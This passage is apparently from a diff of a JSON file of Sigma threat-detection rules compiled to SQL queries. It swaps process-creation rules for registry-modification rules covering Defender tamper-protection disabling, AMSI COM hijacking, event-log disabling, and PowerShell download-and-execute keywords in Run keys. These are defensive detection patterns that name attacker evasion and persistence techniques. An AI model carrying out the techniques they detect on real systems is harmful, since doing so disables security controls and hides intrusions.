"add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Disable Exploit Guard Network Protection on Windows Defender", + "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "status": "experimental", + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1562.001" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND NewValue = 'DWORD (00000001)')" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", - "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Disable Tamper Protection on Windows Defender", + "id": 
"93d298a1-d28f-47f1-a468-d971e7796679", + "status": "experimental", + "description": "Detects disabling Windows Defender Tamper Protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR NewProcessName LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" }, { - "title": "Fake Instance Of Hxtsr.exe", - "id": "4e762605-34a8-406d-b72e-c1a089313320", + "title": "Suspicious Service Installed", + "id": "f2485272-a156-4773-82d7-1d178bc4905b", "status": "test", - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook 
Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", - "author": "Sreeman", + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\') AND NewValue LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hxtsr_masquerading.yml" + "filename": "registry_set_susp_service_installed.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "id": "435e10e4-992a-4281-96f3-38b11106adde", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. 
This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Renamed FTP.EXE Execution", - "id": "277a4393-446c-449a-b0ed-7fdc7795244c", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", "status": "test", - "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", - "author": "Victor Sergeev, oscd.community", + "description": "BlackByte set three different 
registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059", "attack.defense_evasion", - "attack.t1202" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'ftp.exe' AND NOT (NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_renamed_ftp.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Firewall Rule Deleted Via Netsh.EXE", - "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", - "author": "frack113", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Rare falsepositives 
may occur from legitimate administrators disabling specific event log for troubleshooting" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND 
TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((NewProcessName = '') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "WSF/JSE/JS/VBA/VBE File Execution", - "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", - "status": "test", - "description": "Detects suspicious file execution by wscript and cscript", - "author": "Michael Haag", + "title": "Suspicious Powershell In Registry Run Keys", + "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "status": "experimental", + "description": "Detects potential PowerShell commands or code within registry run keys", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + "Legitimate admin or third party scripts. 
Baseline according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh %' ESCAPE '\\' OR NewValue LIKE '%FromBase64String%' ESCAPE '\\' OR NewValue LIKE '%.DownloadFile(%' ESCAPE '\\' OR NewValue LIKE '%.DownloadString(%' ESCAPE '\\' OR NewValue LIKE '% -w hidden %' ESCAPE '\\' OR NewValue LIKE '% -w 1 %' ESCAPE '\\' OR NewValue LIKE '%-windowstyle hidden%' ESCAPE '\\' OR NewValue LIKE '%-window hidden%' ESCAPE '\\' OR NewValue LIKE '% -nop %' ESCAPE '\\' OR NewValue LIKE '% -encodedcommand %' ESCAPE '\\' OR NewValue LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Expression%' ESCAPE '\\' OR NewValue LIKE '%IEX (%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Command%' ESCAPE '\\' OR NewValue LIKE '%ICM -%' ESCAPE '\\' OR NewValue LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR NewValue LIKE '%IWR %' ESCAPE '\\' OR NewValue LIKE '% -noni %' ESCAPE '\\' OR NewValue LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_script_execution.yml" + "filename": "registry_set_powershell_in_run_keys.yml" }, { - "title": "Suspicious Sigverif Execution", - "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "title": "New Root or CA or AuthRoot Certificate to Store", + "id": 
"d223b46b-5621-4037-88fe-fda32eead684", "status": "experimental", - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sigverif.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND NewValue = 
'Binary Data')" ], - "filename": "proc_creation_win_lolbin_sigverif.yml" + "filename": "registry_set_install_root_or_ca_certificat.yml" }, { - "title": "Potential PowerShell Downgrade Attack", - "id": "b3512211-c67e-4707-bedc-66efc7848863", - "status": "test", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Harish Segar (rule)", + "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "status": "experimental", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_downgrade_attack.yml" + "filename": "registry_set_enabling_turnoffcheck.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - 
"description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Disable Privacy Settings Experience in Registry", + "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "status": "experimental", + "description": "Detects registry modifications that disable Privacy Settings Experience", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_disable_privacy_settings_experience.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", - "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Register New IFiltre For Persistence", + "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "status": "experimental", + "description": "Detects when an attacker register a new IFilter for an exntesion. 
Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Legitimate registration of IFilters by the OS or software" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_persistence_ifilter.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND 